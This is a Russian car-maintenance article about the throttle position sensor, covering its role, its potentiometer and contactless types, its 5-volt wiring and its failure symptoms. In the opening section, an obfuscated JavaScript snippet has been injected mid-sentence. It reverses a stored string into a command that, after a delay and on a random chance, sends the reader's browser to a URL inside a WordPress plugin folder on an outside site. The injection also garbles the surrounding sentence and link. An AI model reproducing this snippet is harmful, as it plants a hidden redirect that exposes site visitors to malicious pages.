
Датчик дроссельной заслонки: секреты ответственного элемента
Чтобы в двигателе всё работало слажено, необходим контроль, осуществляемый не только водителем, но ещё и различными блоками управления. Их ушами и глазами выступают всевозможные датчики, в том числе и датчик дроссельной заслонки. Попробуем раскрыть секреты этого маленького, но важного элемента.
[contents]Оглавление
Зачем нужен датчик дроссельной заслонки?
Для начала проясним некоторые нюансы. $NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/ustrojstvo-forsunki-dizelnogo-dvigatelya.html» target=»_blank» rel=»noopener noreferrer»>форсункам, а также момент зажигания. Без такого датчика современный мотор ждёт масса неприятностей.
К примеру, он может неожиданно заглохнуть на холостых, обороты начинают плавать или прыгают хаотично. В конце концов, если датчик дроссельной заслонки вдруг откажет, то на панели приборов загорится надоедливый значок ChekEngine, призывающий Вас как можно скорее заехать в автосервис.
Какие бывают ДПДЗ?
Как мы с Вами видим, датчик положения дроссельной заслонки – элемент хоть и скромный, но ответственный. Давайте откроем его и посмотрим что внутри. Существует несколько его разновидностей:
- на основе потенциометра;
- на основе магниторезистивного датчика (бесконтактный).
В первом случае конструкция представляет собой самый обычный переменный резистор, электрическое сопротивление которого меняется при повороте оси заслонки. Узел имеет, как правило, три контактных вывода.
Один – земляной (масса), второй – информационный, подключаемый к входным цепям контроллера или электронного блока управления, и третий – для подачи напряжения около 5 Вольт. В полностью открытом положении заслонки напряжение на информационном выводе такое же как и питающее – порядка 5 В, а в закрытом – минимальное, практически 0 В.
Если с мотором что-то не то…
Мы уже упоминали, что неисправность датчика дроссельной заслонки может привести к неприятным последствиям. Остановимся ещё раз на моментах, которые могут свидетельствовать о выходе из строя ДПДЗ.